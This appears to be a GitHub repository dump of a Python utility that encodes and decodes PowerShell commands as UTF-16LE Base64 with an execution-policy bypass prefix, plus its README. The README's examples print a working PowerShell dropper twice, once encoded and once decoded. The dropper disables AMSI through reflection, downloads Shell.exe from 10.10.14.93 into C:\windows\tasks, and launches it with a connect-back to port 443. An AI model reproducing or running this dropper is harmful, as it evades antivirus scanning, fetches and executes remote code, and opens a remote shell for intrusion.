├── ps-encoder.py └── README.md /ps-encoder.py: -------------------------------------------------------------------------------- 1 | import sys, base64 2 | 3 | if len(sys.argv) < 3 or sys.argv[1] == "-h" or sys.argv[1] == "--help": 4 | print("Usage: " + sys.argv[0] + " [OPTION]... [FILE]") 5 | print("PowerShell Base64 encode or decode FILE, or standard input, to standard output.") 6 | print("\nWith no FILE provided as the second argument, the second argument will be encoded or decoded\n") 7 | print(" -d, --decode".ljust(20, " ") + "decode the powershell FILE or argument.") 8 | print(" -e, --encode".ljust(20, " ") + "encode the powershell FILE or argument.") 9 | print(" -h, --help".ljust(20, " ") + "display this help and exit.") 10 | print("\n If you want to ouput to a file use the stdout > operator.\n") 11 | sys.exit() 12 | 13 | try: 14 | f = open(sys.argv[2], "r") 15 | ps = f.read() 16 | f.close() 17 | except: 18 | ps = sys.argv[2] 19 | 20 | if sys.argv[1] == "-e" or sys.argv[1] == "--encode": 21 | bytes = ps.encode('utf-16-le') 22 | b64 = base64.b64encode(bytes) 23 | print("powershell.exe -exec bypass -enc " + b64.decode()) 24 | 25 | elif sys.argv[1] == "-d" or sys.argv[1] == "--decode": 26 | b64 = base64.b64decode(ps) 27 | script = b64.decode('utf-16-le') 28 | print(script) 29 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # PowerShell Encoder 2 | A very simple python script to encode and decode PowerShell one-liners. 3 | 4 | I used [Raikia's PowerShell encoder](https://raikia.com/tool-powershell-encoder/]) ALOT, but one day it went down, and I was sad! So I created this simple script that I could run on Linux. 5 | 6 | For anybody that doesn't know PowerShell doesn't just use Base64, it uses UTF16-LE Base64. 7 | 8 | ## Usage 9 | 10 | Show the help: 11 | 12 | ``` 13 | ./ps-encoder.py 14 | Usage: ./ps-encoder.py [OPTION]... [FILE] 15 | PowerShell Base64 encode or decode FILE, or standard input, to standard output. 16 | 17 | With no FILE provided as the second argument, the second argument will be encoded or decoded 18 | 19 | -d, --decode decode the powershell FILE or argument. 20 | -e, --encode encode the powershell FILE or argument. 21 | -h, --help display this help and exit. 22 | 23 | If you want to ouput to a file use the stdout > operator. 24 | ``` 25 | 26 | ## Examples 27 | 28 | ### Encode 29 | 30 | Encode a PowerShell dropper file: 31 | 32 | ``` 33 | ./ps-encoder.py -e dropper.txt 34 | powershell.exe -exec bypass -enc JABhACAAPQAgAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAcwAoACkAOwBGAG8AcgBFAGEAYwBoACgAJABiACAAaQBuACAAJABhACkAIAB7AGkAZgAgACgAJABiAC4ATgBhAG0AZQAgAC0AbABpAGsAZQAgACIAKgBpAHUAdABpAGwAcwAiACkAIAB7ACQAYwAgAD0AIAAkAGIAfQB9ADsAJABkACAAPQAgACQAYwAuAEcAZQB0AEYAaQBlAGwAZABzACgAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA7AEYAbwByAEUAYQBjAGgAKAAkAGUAIABpAG4AIAAkAGQAKQAgAHsAaQBmACAAKAAkAGUALgBOAGEAbQBlACAALQBsAGkAawBlACAAIgAqAGkAdABGAGEAaQBsAGUAZAAiACkAIAB7ACQAZgAgAD0AIAAkAGUAfQB9ADsAJABmAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAGYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AOQAzAC8AUwBoAGUAbABsAC4AZQB4AGUAIgAsACAAIgBDADoAXAB3AGkAbgBkAG8AdwBzAFwAdABhAHMAawBzAFwAUwBoAGUAbABsAC4AZQB4AGUAIgApADsACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXABTAGgAZQBsAGwALgBlAHgAZQAiACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIAMQAwAC4AMQAwAC4AMQA0AC4AOQAzACAANAA0ADMAIgA7AAoA 35 | ``` 36 | 37 | To file: 38 | 39 | ``` 40 | ./ps-encoder.py -e dropper.txt > encoded-dropper.txt 41 | ``` 42 | 43 | ### Decode 44 | 45 | Decode a PowerShell dropper: 46 | 47 | ``` 48 | ./ps-encoder.py -d JABhACAAPQAgAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAcwAoACkAOwBGAG8AcgBFAGEAYwBoACgAJABiACAAaQBuACAAJABhACkAIAB7AGkAZgAgACgAJABiAC4ATgBhAG0AZQAgAC0AbABpAGsAZQAgACIAKgBpAHUAdABpAGwAcwAiACkAIAB7ACQAYwAgAD0AIAAkAGIAfQB9ADsAJABkACAAPQAgACQAYwAuAEcAZQB0AEYAaQBlAGwAZABzACgAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA7AEYAbwByAEUAYQBjAGgAKAAkAGUAIABpAG4AIAAkAGQAKQAgAHsAaQBmACAAKAAkAGUALgBOAGEAbQBlACAALQBsAGkAawBlACAAIgAqAGkAdABGAGEAaQBsAGUAZAAiACkAIAB7ACQAZgAgAD0AIAAkAGUAfQB9ADsAJABmAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAGYAaQBsAGUAKAAiAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AOQAzAC8AUwBoAGUAbABsAC4AZQB4AGUAIgAsACAAIgBDADoAXAB3AGkAbgBkAG8AdwBzAFwAdABhAHMAawBzAFwAUwBoAGUAbABsAC4AZQB4AGUAIgApADsACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGEAcwBrAHMAXABTAGgAZQBsAGwALgBlAHgAZQAiACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIAMQAwAC4AMQAwAC4AMQA0AC4AOQAzACAANAA0ADMAIgA7AAoA 49 | $a = [Ref].Assembly.GetTypes();ForEach($b in $a) {if ($b.Name -like "*iutils") {$c = $b}};$d = $c.GetFields('NonPublic,Static');ForEach($e in $d) {if ($e.Name -like "*itFailed") {$f = $e}};$f.SetValue($null,$true); 50 | (new-object system.net.webclient).downloadfile("http://10.10.14.93/Shell.exe", "C:\windows\tasks\Shell.exe"); 51 | Start-Process -FilePath "C:\Windows\Tasks\Shell.exe" -ArgumentList "10.10.14.93 443"; 52 | ``` 53 | 54 | To file: 55 | 56 | ``` 57 | ./ps-encoder.py -d encoded-dropper.txt > dropper.txt 58 | ``` 59 | --------------------------------------------------------------------------------